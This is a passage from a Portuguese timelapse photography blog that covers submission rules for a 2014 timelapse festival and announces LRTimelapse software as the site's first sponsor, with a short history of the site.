Porém, se o video for seleccionado terá a oportunidade de correr pelas várias cidades (Ora aqui está uma das novidades deste ano)

Por motivos técnicos não serão aceites trabalhos com resolução inferior a 1080p! Telas e projecções de alta qualidade obriga a imagens de alta qualidade.

Outra das novidades é a força para usar taxas de amostragem mais elevadas, portanto, para os mais “temerários” poderão usufruir de taxas como 48, 50 ou 60!

Do resto: Originalidade, inovação e boa sorte aos que participarem.
Deixo claro que têm todo o apoio do timelapse.pt, dúvidas e questões, ajudas à produção e muito mais.

Deixo aqui o link para o regulamento completo, leitura extremamente recomendada!
Regras participação timelapse showfest 2014

 

 

Primeiro patrocinio – LRTimelapse

É com enorme prazer e orgulho que anuncio que o LRTimelapse de Gunther Wegner patrocina a plataforma timelapse.pt!
Para quem desconhece, LRTimelapse é uma das ferramentas mais imprescindíveis para a preparação das sequências timelapse antes da passagem para o software de edição. É um passagem fundamental para o controlo de uma enorme quantidade e parâmetros possíveis no pré-tratamento das imagens. É desenvolvida pelo Gunther Wegner que também usufrui do seu sitema para os seus trabalho! Obrigado pelo apoio Gunther!!!

Sendo este o primeiro post de blog aproveito para, resumidamente, contar um pouco da história. Desde 2012 (durante o final da AcademiaRTP) que, com muita calma, trabalho neste site, criar o conceito do logotipo, começar a construção, afinar as pontas, retirar o que não interessa e restringir-me no essencial e a tão importante procura de apoios. Ao longo deste tempo, tive a oportunidade de conhecer e trabalhar com um número largo de pessoas, não só interessadas no timelapse em si, mas também reconheceram o potencial do site. A todas essas pessoas agradeço imenso pela força e apoio.

Deixo um agradecimento especial ao Gunther por acreditar quase que cegamente na plataforma, sem dúvida que irá ser uma forte parceria e que dará muitos frutos.

Há imensa coisa que gostaria de escrever, mas temo que seria como escrever um romance interminável. Assim sendo, deixo algumas coisas para a próxima colocação no blog.

Planos para o futuro? Tantos, talvez demasiados, porém para começar, os tutoriais são já um enorme passo para mim. Aproveito para agradecer todos os colegas, amigos, família e namorada pela força, ideias, argumentações e acalmar-me nas alturas de maior stress. 🙂

Sigam o link para o site do LRTimelapse, caso não conheçam é sem dúvida uma ferramenta de enorme utilidade que tem de ser vista!

LRTimelapse

LRTimelapse

Que o timelapse esteja convosco!!

Connect with us

© timelapse.pt 2016